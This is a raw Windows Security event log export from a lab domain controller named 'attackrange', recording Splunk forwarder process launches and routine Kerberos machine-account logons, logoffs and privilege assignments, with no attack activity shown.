SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264349
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b20
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:06:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264351
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1548
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:06:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264352
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1428
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:06:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264353
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x83c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264355
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264354
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264359
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FA424
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264358
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FA424
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62558
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264357
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FA424
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264361
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264360
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ac8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264362
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x173c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:07:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264363
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264365
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FC030
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62564
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264364
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FC030
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264366
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264368
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264367
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264374
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD788
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264373
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FD788
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62569
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264372
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD788
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264371
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD71C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264370
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FD71C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62568
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264369
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD71C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264377
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FE41A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264376
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FE41A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62577
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264375
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FE41A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264379
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264378
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bfc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264380
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1014
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
